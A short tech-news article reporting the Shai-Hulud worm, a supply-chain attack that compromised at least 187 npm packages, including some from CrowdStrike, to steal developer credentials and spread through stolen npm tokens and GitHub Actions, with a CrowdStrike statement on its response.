- A new supply-chain attack compromised at least 187 npm packages, targeting developer secrets across software projects
- Shai-Hulud worm looks to steal credentials, modify packages, and spread malware through GitHub Actions and npm tokens
- Researchers warn the number of compromised packages is likely to grow
At least 187 malicious npm packages have been uncovered, part of a yet another major supply-chain attack against software developers.
Security researchers from Socket, StepSecurity, and Aikido all detected an ongoing campaign, apparently being orchestrated by the same group that targeted Nx several weeks ago.
Similar to that campaign, in this one the miscreants were also after developer secrets, including login credentials, AWS keys, GCP and Azure service credentials, GitHub personal access tokens, cloud[1] metadata endpoints, or npm authentication tokens.
Many affected
However, the attack methodology evolved, the researchers noted.
“The scale, scope and impact of this attack is significant,” they explained. “The attackers are using the same playbook in large parts as the original attack, but have stepped up their game.”
This time around, the attackers created a worm, called Shai-Hulud (a nod to the Dune worm), which not only steals secrets and publishes them to GitHub publicly (using tools like TruffleHog and queries on cloud metadata endpoints), but also drops a malicious GitHub Action that sends secrets to an attacker-controlled webhook and hides them in logs, and uses stolen npm tokens to modify and republish every package the maintainer controls, embedding the worm in each one.
Among the compromised npm packages are those from cybersecurity experts CrowdStrike, as well as others with millions of weekly downloads.
CrowdStrike, on its end, did what it could to mitigate the risk and minimize the damage.
“After detecting several malicious Node Package Manager (NPM) packages in the public NPM registry, a third-party open source repository, we swiftly removed them and proactively rotated our keys in public registries,” a CrowdStrike spokesperson said, The Register reports.
“These packages are not used in the Falcon sensor, the platform is not impacted and customers remain protected. We are working with NPM and conducting a thorough investigation.”
At the moment the number of packages affected by the attack sits at 187, the researchers warned that the number will most likely continue to rise. Some potentially compromised packages are currently pending validation.
Via The Register[2]
You might also like
References
- ^ cloud (www.techradar.com)
- ^ The Register (www.theregister.com)